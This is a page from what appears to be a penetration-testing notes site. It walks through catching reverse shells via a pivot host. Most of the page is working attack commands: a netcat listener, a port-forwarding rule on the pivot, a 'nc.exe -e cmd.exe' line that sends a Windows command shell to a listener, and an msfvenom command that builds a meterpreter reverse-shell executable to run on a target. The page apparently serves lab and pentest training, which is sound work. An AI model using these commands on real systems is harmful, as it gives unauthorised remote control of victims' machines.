Setup Reverse Shells through Pivot

Here's how you can set up a netcat listener and pivot connections using Netcat and Metasploit:

Step 1: Set Up the Netcat Listener

First, you need to set up a Netcat listener on your local machine (Kali) to accept incoming connections.

  1. Start Netcat Listener:

    nc -nvlp 2222

    This command will listen on port 2222 on your local machine.

Step 2: Set Up the Listener Add Command

Now, configure the listener to forward any incoming connections on a different port (e.g., port 1234) to your local machine's port 2222.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222

    • This command tells the listener to forward any incoming connections that hit port 1234 on your pivot machine to your localhost (127.0.0.1) on port 2222.

    You should see a message confirming the listener is set up and active.

Step 3: Verify the Listener is Active

You can check if the listener is active by running the following command:

  1. Check Active Listeners:

    listener_list

    This will show you the listeners that are currently active. You should see the listener set up in the previous step.

Step 4: Testing the Listener with Netcat

Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., client01) using Netcat:

  1. Connect Back to Listener on your pivot machine: On the pivot machine, use the following Netcat command to connect back to your machine on port 1234, which will forward the traffic to localhost:2222.

    nc.exe -nv 10.10.120.131 1234 -e cmd.exe

    • 10.10.120.131 is the IP address of your pivot machine.

    • Port 1234 is where the traffic will be forwarded to localhost:2222.

    • The -e cmd.exe option will execute the cmd.exe on the target machine, providing you with a shell.

Step 5: Using Metasploit for Reverse Shell

To automate this process or use a reverse shell, you can use Metasploit to generate a payload that will connect back to your pivot machine's IP.

  1. Generate a Reverse Shell with Metasploit:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe

    • LHOST=172.16.76.14 is the IP address of your pivot machine.

    • LPORT=1234 is the port you're forwarding traffic to.

    • -o shell2.exe specifies the output filename.

  2. Execute the Payload: After transferring and executing shell2.exe on the target machine, it will establish a reverse shell connection back to your listener on port 1234, which is forwarded to localhost:2222.

PreviousBasic PivotingNextTransferring Files through Pivot

Last updated